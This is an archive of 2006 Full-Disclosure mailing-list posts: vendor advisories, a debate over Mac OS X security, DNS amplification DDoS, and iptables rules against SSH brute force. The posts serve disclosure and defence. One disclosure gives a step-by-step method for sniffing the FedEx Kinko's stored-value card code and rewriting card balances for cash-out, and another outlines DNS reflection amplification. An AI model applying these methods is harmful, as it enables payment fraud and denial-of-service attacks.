Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Stephen Johnson
Mac's have always held the distinction of being more secure by, among other
things, not being a target.  -- Due to the lack of extensive use, virus and
mal ware writers have ignored taking the time to write virus for Macs.

Simple philosophy -  Why climb the wall , when you can walk through the
door.  

Windows is easier and more prolific, until that changes, we are not going to
see major attacks on the mac platform.

JMHO


On 2/28/06 12:04 AM, Ferdinand Klinzer [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Hey Guys,
 
 What you think about the latest Mac OS X 10.4.x Security flaws?
 I think it will go fast then it goes like Windows Systems more and
 more Trojan Horse and other security bugs...
 
 I only want make a thread about what you think?
 
 Cheers
 
 Ferdinand 
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.1 (Darwin)
 
 iD8DBQFEBAQoivpgT1glX4cRAow2AJ4xcl8to6Vtzb/mAccqjSG0WuE1jwCeJpeV
 OKrrslBaBNxiV1GcLHgvcPU=
 =bNj4
 -END PGP SIGNATURE-
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

-- 
Stephen Johnson
The Lone Coder

http://www.ouradoptionblog.com
*Join us on our adoption journey*

[EMAIL PROTECTED]
http://www.thelonecoder.com

*Continuing the struggle against bad code*
--


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 983-1] New pdftohtml packages fix several vulnerabilities

2006-02-28 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 983-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 28th, 2006 http://www.debian.org/security/faq
- --

Package: pdftohtml
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no

Derek Noonburg has fixed several potential vulnerabilities in xpdf,
which are also present in pdftohtml, a utility that translates PDF
documents into HTML format.

The old stable distribution (woody) does not contain pdftohtml packages.

For the stable distribution (sarge) these problems have been fixed in
version 0.36-11sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 0.36-12.

We recommend that you upgrade your gpdf package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.dsc
  Size/MD5 checksum:  602 8dc87f9f04bf4e95d628a81540b5320e

http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.diff.gz
  Size/MD5 checksum:11953 aa4fe47eeec4ff81df92aab8f218f1f1

http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36.orig.tar.gz
  Size/MD5 checksum:   300922 75ad095bb51e1f66c9f7691e6af12f44

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_alpha.deb
  Size/MD5 checksum:   314142 b5bd8a038769a31b74bc9baf7498

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_amd64.deb
  Size/MD5 checksum:   259728 a16f018455f8e3409399f9123af3c17a

  ARM architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_arm.deb
  Size/MD5 checksum:   266500 bbf302ca14ddad34769b0b8a5822d139

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_i386.deb
  Size/MD5 checksum:   253988 fd6e84484e62b90ff4eb419bdff63044

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_ia64.deb
  Size/MD5 checksum:   374206 900ea16bffd41ff59272bab4e89077a9

  HP Precision architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_hppa.deb
  Size/MD5 checksum:   330356 4bf2182b3dc9f1269efb039c07fceea3

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_m68k.deb
  Size/MD5 checksum:   234812 34eb54fb6c07676aee15a9cc15110c28

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mips.deb
  Size/MD5 checksum:   311482 2540b6b4c0b523087a40fb4ef7b57c46

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mipsel.deb
  Size/MD5 checksum:   307188 16034038f8c3c206623702c4b3695b69

  PowerPC architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_powerpc.deb
  Size/MD5 checksum:   269634 4053b1c0d6c76ca5c94ee97df412b5e5

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_s390.deb
  Size/MD5 checksum:   242482 ff9f29460ad1cb56b4c92dfd3e1e2d57

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_sparc.deb
  Size/MD5 checksum:   245378 d1ecf4c546240dab174947827b01766e


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFEBCZ5W5ql+IAeqTIRAhc3AJ98FvheYHaNnpIW4lCYjqsVD0JDmQCeO54D
8x13RBAhHVkh9GvAHmI7Sx8=
=KfUo
-END PGP SIGNATURE-


[Full-disclosure] recursive DNS servers DDoS as a growing DDoS problem

2006-02-28 Thread Gadi Evron

Hi guys.

We discussed recursive DNS servers before (servers which allow to query 
anything - including what they are not authoritative for, through them).


The attack currently in the wild is a lot bigger and more complicated 
than this, but to begin, here is an explanation (by metaphor) of that part:
Spoofed ICMP attacks have been around for a while. How many of us still 
get quite a bit of ICMP echo replies stopped at our borders? These 
replies come to us due to spoofed attacks using our addresses.


Now, imagine it - only bigger:
Smurf.

Introduce an amplification effect.

As bigger UDP packets will be fragmented by the servers, and UDP 
obviously does not do any handshake and can easily be spoofed...
The server receives a large packet, breaks it down to several fragments 
and moves the query on.

That's where the amplification effect _starts_.

Both the attacked server and the unwilling participant in the attack, 
the recursive servers, experience a serious DNS denial of service that 
keeps getting amplified considerably.


One of the problems is obviously the spoofing. Let us, metaphorically 
and WRONGLY treat it for a minute as the remote exploit.


The second part of this problem is the recursive server, which for the 
moment we will WRONGLY treat as the local exploit.


Obviously both need to be fixed. Which is easier I am not so sure.

In the past, most network operators refused to implement best practices 
such as BCP38 (go Fergie!) because they saw no reason for the hassle. 
Returning back to: if it isn't being exploited right now, why should I 
worry about it?


Well, it is being exploited now, and will be further exploited in the 
future. Combating spoofing on the Internet is indeed important and now 
becoming critical.


Removing the spoofing part for a second, the attack vector for this can 
easily be replaced, as one example, with a botnet.


A million Trojaned hosts sending in even one packet a minute would cause 
quite a buzz - and do. Now amplify the effect by the recursive servers 
and...


So, putting the spoofing aside, what do we do about our recursive servers?

There are some good URL's for that, here are some:
http://www.us-cert.gov/reading_room/DNS-recursion121605.pdf
http://cc.uoregon.edu/cnews/winter2006/recursive.htm
http://dns.measurement-factory.com/surveys/sum1.html

The recursive behaviour is necessary for some authoritative servers, but 
not for all. As a best practice for organizations, as an example, the 
server facing the world should not also be the one facing your 
organization (your users/clients). Limiting this ability to your network 
space is also a good idea.


If you would like to check for yourselves, here is a message from Duane 
Wessels [1] to the DNS-operations [2] mailing list where this is 
currently being discussed:

-
If anyone has the need to test particular addresses for the
presence of open resolvers, please feel free to use this tool:

http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl

It will send a single recursion desired query to a target address.
If that query is forwarded to our authoritative server, the host
has an open resolver running at that address.
-

Dan (DA MAN) Kaminsky and Mike Schiffman have done some impressive work 
on this subject, outlined in Dan's latest ShmooCon talk.

They found ~580K open resolvers:
http://deluvian.doxpara.com/, http://www.doxpara.com/

I suggest those of us who need more information or help go to the 
DNS-operations mailing list from OARC (see below) and ask the experts 
there, now that this is finally public.


Thanks,

Gadi.

[1] Duane Wessels - DNS genius and among other accomplishments the 
author of dns top.

[2] DNS-operations - http://lists.oarci.net/mailman/listinfo/dns-operations

--
http://blogs.securiteam.com/

Out of the box is where I live.
-- Cara Starbuck Thrace, Battlestar Galactica.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Fedex Kinkos Smart Card Authentication Bypass

2006-02-28 Thread Lance James
Abstract:
-
The ExpressPay stored-value card system used by FedEx Kinko's is
vulnerable to attack.  An attacker who gains the ability to alter the
data stored on the card can use FedEx Kinko's services fraudulently
and anonymously, and can even obtain cash from the store.


Description:

The FedEx Kinko's ExpressPay system, developed by enTrac Technologies
of Toronto, Ontario, is based on a Siemens / Infineon SLE4442 memory
chip card.  The data stored on this card is freely rewritable once a
three-byte security code has been presented to the card's security
logic.  Neither this security code nor the data stored on the card is
encrypted; anyone able to obtain the security code is free to rewrite
the data stored on the card using an inexpensive commercially
available smart card reader/writer.

The first thirty-two bytes of the memory chip card are writable and
subsequently permanently write-protectable (in this application, these
bytes are write-protected), and contain a header which identifies the
card as an ExpressPay stored-value card.  Bytes 0x20 through 0x27
contain the value stored on the card, represented in IEEE 754
double-precision floating point format.  Bytes 0x60 through 0x6A
contain the card's eleven-digit serial number stored as unsigned
zoned-decimal ASCII; digits 0x60 through 0x63 are the store number the
card was initially issued at, and the remaining seven digits are
assigned sequentially at the moment of first issue.  A timestamp
indicating date and time of issue are located from 0x30 through 0x37,
and is repeated from 0xC7 through 0xCE.

In order to write to the card, a three-byte security code must be
presented in a specific sequence of commands as outlined by the
SLE4442's white paper.  By soldering wires to the contact points of
the card and then connecting those wires to an inexpensive logic
analyzer, an attacker can sniff the three-byte code as the kiosk or a
card terminal prepares to write data to the card.  This security code
appears to be the same across all FedEx Kinko's ExpressPay cards
currently in circulation.

Once the three-byte code is known to the attacker, the card's stored
value and serial number can be changed to any value.  The ExpressPay
system appears to implicitly trust the value stored on the card,
regardless of what that value actually is.  The system will also
accept cards with obviously fake serial numbers (e.g. a non-existent
store number followed by all nines).  Using these altered cards,
xeroxes can be made from any machine with a card reader, and computers
can be rented anonymously and indefinitely.  Most disturbing, however,
is that since stored-value cards can be cashed out by an employee at
the register at any time, an attacker could cash out altered cards
obtained at little or no monetary cost.  If a card is cashed out, its
serial number does not appear to be invalidated in the system.  If an
attacker were to clone a known good card and cash it out, the clone
would still be usable.


Tested Vendors:
---
- FedEx Kinko's


Suspected Vendors:
--
- Any client of enTrac Technologies who uses the ExpressPay
stored-value card system.
- Any company which uses a stored-value card system based on the SLE4442


Vendor and Patch Information:
-
Proof-of-concept of the initial security vulnerability was achieved on
8 February 2006, with research into the ramifications continuing
through 12 February.  Copies of this report were sent to both FedEx
Kinko's and enTrac Technologies on 15 February; a read receipt was
returned from enTrac on 19 February, while no receipt has yet been
received from FedEx Kinko's.


Solution:
-
- Encrypt data before storing it on the SLE4442 card, or migrate to a
system which uses cards which have built-in encryption functionality.
- Verify that the stored value on the card does not significantly
differ from a reference value stored in a database.
- Do not allow the use of cards with invalid serial numbers.
- Invalidate serial numbers of cards that are cashed out.


Credits:

Strom Carlson, Secure Science Corporation: Hardware Security Division
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Secunia Research: ArGoSoft Mail Server Pro viewheaders Script Insertion

2006-02-28 Thread Secunia Research
== 

 Secunia Research 27/02/2006

  - ArGoSoft Mail Server Pro viewheaders Script Insertion -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

ArGoSoft Mail Server Pro 1.8.8.5

NOTE: Prior versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: Cross-Site Scripting
Where:  Remote

== 
3) Vendor's Description of Software 

ArGoSoft Mail Server is full SMTP/POP3/Finger/IMAP server for all
Windows platforms, which will let you turn your computer into the email
system. It is very compact, takes about 1-5 Mb of disk space (depending
on the version), does not have any specific memory requirements, and
what is the most important - it's very easy to use.

Product Link:
http://www.argosoft.com/rootpages/MailServer/Default.aspx

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in ArGoSoft Mail Server
Pro, which can be exploited by malicious people to conduct script
insertion attacks.

Input passed in various e-mail headers (e.g. subject and from) is
not properly sanitised before being displayed by the View Headers
functionality. This can be exploited to insert arbitrary HTML and
script code, which is executed in a user's browser session in context
of a vulnerable site when viewing the headers of a malicious e-mail.

== 
5) Solution 

Update to version 1.8.8.6 or later.

== 
6) Time Table 

24/02/2006 - Vendor notified.
24/02/2006 - Vendor response.
27/02/2006 - Public disclosure.

== 
7) Credits 

Discovered by Secunia Research.

== 
8) References

No other references available.

== 
9) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-6/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Steven Rakick
This is a perfect example of the idiocy pushing the
OSX security myth:

http://slashdot.org/comments.pl?sid=178631threshold=1commentsort=1mode=threadcid=14809189



__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Michael Holstein

What you think about the latest Mac OS X 10.4.x Security flaws?
I think it will go fast then it goes like Windows Systems more and
more Trojan Horse and other security bugs...


I think McAfee, Symantec, et.al. are all licking their chops at a new 
venue to hawk their products. I wouldn't be at all surprised if they're 
at least indirectly behind some of the research into those 
vulnerabilities.


MAC users are also part of this problem, IMHO .. they're an elitist 
group that thinks their trendy little toy is immune to everything. Add 
to that MAC is built on UNIX, something your average art student knows 
even less about than Windows, and an operating system that's a lot more 
fun to tamper with once you're in.


My $0.0184 (6% Ohio taxes withheld)

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread Jay Libove
Quite some time back, I posted a question here about brute force login 
attempts through SSH which had recently become a noticeable annoyance. 
There was some discussion here on the list, someone suggested using 
hashlimit, and I think the issue of brute force attempts through SSH has 
become just one more part of the background noise of the Internet.


I finally got back around to looking at this on my system, and I figured 
out why my first attempts at using the hashlimit functionality in iptables 
had not worked.  Hopefully late is better than never, so I present it here 
to anyone else who was as stupid and/or lazy as I was :) so that it took 
me this long to get back to work on it and get it right.


Here is an iptables command to allow inbound SSH with a quite low limit on 
the number of connections which may arrive from a specific IP address in a 
short period of time. Combined with the default setting of OpenSSH which 
drops a connection after just a few failed login attempts, this has 
reduced the number of failed logins I am seeing in my nightly logwatch 
output from thousands to about ten per day. Since this use of hashlimit 
filters on source IP address, it does not create a denial of service 
against legitimate SSH connections, unless someone spoofs a very large 
range of source addresses and can somehow get those connections to 
actually open instead of just consume partly open TCP sessions.  In such a 
case, other defenses are needed anyway.


# iptables --table filter -A INPUT --protocol tcp --source 0/0 \
--destination-port ssh -m hashlimit --hashlimit 2/minute \
--hashlimit-burst 3 --hashlimit-mode srcip --hashlimit-name ssh \
-m state --state NEW --jump ACCEPT

The stupid thing I did the first time I tried to set this up months ago 
was to put a command like the above in, and forget to take out the 
original iptables command allowing connections to the SSH port. 
hashlimit is a limiter on an iptables rule.  Having one rule with a 
hashlimit in it, and a second matching rule with no hashlimit, just 
results in all connections being accepted without limit.


Of course, the same thing would work to reduce brute force speeds on 
telnet, FTP, etc by changing the destination port argument.



Please direct all flames to /dev/null, all cash contributions to /dev/me 
:) and all constructive comments and enhancement suggestions back to the 
list.


Cheers!
-Jay
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Paul Schmehl
--On Tuesday, February 28, 2006 00:15:10 -0800 Stephen Johnson 
[EMAIL PROTECTED] wrote:



Mac's have always held the distinction of being more secure by, among
other things, not being a target.  -- Due to the lack of extensive use,
virus and mal ware writers have ignored taking the time to write virus
for Macs.

Simple philosophy -  Why climb the wall , when you can walk through the
door.

Windows is easier and more prolific, until that changes, we are not going
to see major attacks on the mac platform.

I think you're living in a fantasy world.  The recent vulnerability, which 
allows the running of arbitrary code simply by clicking on a linked zip 
file will probably result in at least a handful of new viruses/worms for 
the Mac platform within the next week or two.


Apple has made the same stupid mistake Microsoft has been making for years 
- mixing code and data and trying to make things easy for the user (read 
auto-launch this widget so you don't have to save and open.)  The end 
result will be disaster for the Mac, but, thankfully, not on the same scale 
as Windows because not every user is an admin, and it requires the use of 
sudo to perform administrative functions.


Still, the ignorance of Mac users, who believe their platform is somehow 
magically secure will contribute to the problem.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread KF (lists)


 I wouldn't be at all surprised if they're at least indirectly behind 
some of the research into those vulnerabilities.



Although I can not speak for Leap.A you are completly wrong with regard 
to the InqTana variants.


http://digitalmunition.com/InqTanaThroughTheEyes.txt
http://www.securityfocus.com/columnists/389

P.S.  InputManagers are sexy.

-KF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread KF (lists)


I think you're living in a fantasy world.  The recent vulnerability, 
which allows the running of arbitrary code simply by clicking on a 
linked zip file will probably result in at least a handful of new 
viruses/worms for the Mac platform within the next week or two.


I agree 100% . Zip file / metadata bug added to a malicious InputManager 
, fucked up dyld file or environment.plist  is like instant IE style 
popup city for Mac users running Safari. It would literally take about 
20 minutes to put something together.


-KF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Stef
On 2/28/06, Paul Schmehl [EMAIL PROTECTED] wrote:
snip

 Still, the ignorance of Mac users, who believe their platform is somehow
 magically secure will contribute to the problem.

 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu/ir/security/


I am sorry, Paul, but I have to take you up on this, especially with
your tendency of generalizing everything. I have used *nix in the
past, for all my network and security tools, until MacOSX presented
itself as an opportunity for migration, when I had a need for a new
laptop (over two years ago). At that time the 2.6 kernel and available
modules weren't up to the tasks of the latest hardware capabilities of
x86 laptops, so - on an advice from a friend of mine - I have tried an
iBook. I have been able to compile and port all my tools just fine,
especially with the help of the underlying like-BSD infrastructure
(long live fink and Darwin-ports). All I can tell you is that - ever
since - I never looked back at other choices (w/the exception of
Windows, which was never considered among choices, anyway, due to
limitations in cygwin, not talking about the many other obvious
reasons for the OS, itself ;)), and have recently got myself the
latest still-PPC Powerbook, which just confirmed the rightness of the
original migration. As a repository of security and network tools, I
have thrown at this baby everything I can possible think of, and still
haven't found a way to break it ...

... so the Mac users are not [only] the bunch of idiots/ignorants whom
you tend to describe - I would just invite you to attend a blackhat or
shmoocon, or even SANS or Cisco networkers, and let me know how many
Mac users you can count there ... and then ask yourself why ... but
then, again, I may be wrong ;

Stef
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread Matthijs van Otterdijk
I haven't tried this myself, and I don't know if it is already
suggested, but this should stop all the pesky scriptkiddies from
filling up your logs. Might prove to be a better solution, who knows:
http://aplawrence.com/Security/sshloginattack.html

Matthijs
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] reduction of brute force log

2006-02-28 Thread Bob Radvanovsky
I am going to test these rules out -- this looks REALLy good!  But...I've got 
just ONE question: why on Earth would you permit ICMP???

And what significances are ports 50, 51, 1599, 1600 and 1601?  443 and 80 are 
HTTP-S and HTTP (respectively), 123 is NTP -- I realize that, but what are 
these others ports used for?

-r

*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:RH-Firewall-1-INPUT - [0:0]
-A INPUT -j RH-Firewall-1-INPUT
-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
-A RH-Firewall-1-INPUT -s 10.0.0.0/24 -j ACCEPT
-A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT
-A RH-Firewall-1-INPUT -p 50 -j ACCEPT
-A RH-Firewall-1-INPUT -p 51 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -m recent 
--rcheck --name SSH -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 123 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 443 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1599 -m 
recent --name SSH --remove -j DROP
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1600 -m 
recent --name SSH --set -j DROP
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1601 -m 
recent --name SSH --remove -j DROP
-A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited
COMMIT


- Original Message -
From: Matthijs van Otterdijk [mailto:[EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSH  
through iptables --hashlimit


 I haven't tried this myself, and I don't know if it is already suggested,
 but this should stop all the pesky scriptkiddies from filling up your logs.
 Might prove to be a better solution, who knows:
 http://aplawrence.com/Security/sshloginattack.html
 
 Matthijs
 
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Steven Rakick
Ok, first of all, the fact that you even mention
Blackhat, SANS or Cisco Networkers makes me question
if I should even respond...I will anyway.

Yes, it's true a lot of folks, particularly in the
security realm use Macs, myself included. The reason I
use it has nothing to do with an imaginary belief in
security supremacy, but rather that the tools I use on
a daily basis run natively along side software like MS
office. Previously, like many others, I would have
been forced to run a kludgy dual boot or VMware based
solution to solve this. OSX was the perfect solution.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On
Behalf Of Stef
Sent: Tuesday, February 28, 2006 11:14 AM
To: Untitled
Subject: Re: [Full-disclosure] Question about Mac OS X
10.4 Security

On 2/28/06, Paul Schmehl [EMAIL PROTECTED] wrote:
snip

 Still, the ignorance of Mac users, who believe their
platform is 
 somehow magically secure will contribute to the
problem.

 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu/ir/security/


I am sorry, Paul, but I have to take you up on this,
especially with your tendency of generalizing
everything. I have used *nix in the past, for all my
network and security tools, until MacOSX presented
itself as an opportunity for migration, when I had a
need for a new laptop (over two years ago). At that
time the 2.6 kernel and available modules weren't up
to the tasks of the latest hardware capabilities of
x86 laptops, so - on an advice from a friend of mine -
I have tried an iBook. I have been able to compile and
port all my tools just fine, especially with the help
of the underlying like-BSD infrastructure (long live
fink and Darwin-ports). All I can tell you is that -
ever since - I never looked back at other choices
(w/the exception of Windows, which was never
considered among choices, anyway, due to limitations
in cygwin, not talking about the many other obvious
reasons for the OS, itself ;)), and have recently got
myself the latest still-PPC Powerbook, which just
confirmed the rightness of the original migration. As
a repository of security and network tools, I have
thrown at this baby everything I can possible think
of, and still haven't found a way to break it ...

... so the Mac users are not [only] the bunch of
idiots/ignorants whom you tend to describe - I would
just invite you to attend a blackhat or shmoocon, or
even SANS or Cisco networkers, and let me know how
many Mac users you can count there ... and then ask
yourself why ... but then, again, I may be wrong ;

Stef
___
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force log

2006-02-28 Thread Matthijs van Otterdijk
Hey, I didn't write it, I just copied a link :P. Maybe the author likes to be pinged? Dunno what those ports are...On 2/28/06, Bob Radvanovsky 
[EMAIL PROTECTED] wrote:I
am going to test these rules out -- this looks REALLy
good!But...I've got just ONE question: why on Earth would
you permit ICMP???And what significances are ports 50, 51,
1599, 1600 and 1601?443 and 80 are HTTP-S and HTTP
(respectively), 123 is NTP -- I realize that, but what are these others
ports used for?-r*filter:INPUT ACCEPT [0:0]:FORWARD ACCEPT [0:0]:OUTPUT ACCEPT [0:0]:RH-Firewall-1-INPUT - [0:0]-A INPUT -j RH-Firewall-1-INPUT-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT-A RH-Firewall-1-INPUT -s 10.0.0.0/24 -j ACCEPT-A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT-A RH-Firewall-1-INPUT -p 50 -j ACCEPT
-A RH-Firewall-1-INPUT -p 51 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -m recent --rcheck --name SSH -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 123 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 443 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1599 -m recent --name SSH --remove -j DROP-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1600 -m recent --name SSH --set -j DROP
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1601 -m recent --name SSH --remove -j DROP-A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibitedCOMMIT- Original Message -
From: Matthijs van Otterdijk [mailto:[EMAIL PROTECTED]]To: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit
 I haven't tried this myself, and I don't know if it is already suggested, but this should stop all the pesky scriptkiddies from filling up your logs. Might prove to be a better solution, who knows:
 http://aplawrence.com/Security/sshloginattack.html Matthijs
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Stef
If you look at the [very, very] specific paragraph I was referring to,
from Paul's email, then I hope you will agree with me that what I was
trying to convey was the need to avoid generalizing categorization of
users ... having said that, the implications are that a much higher
awareness, and - in turn - possibility of addressing and/preventing
issues related to vulnerabilities exists in the Mac community, vs. the
Windows one, for example.

Stef

P.S. Sorry for top-posting, but going back to the end would have made
this a mess ...

On 2/28/06, Steven Rakick [EMAIL PROTECTED] wrote:
 Ok, first of all, the fact that you even mention
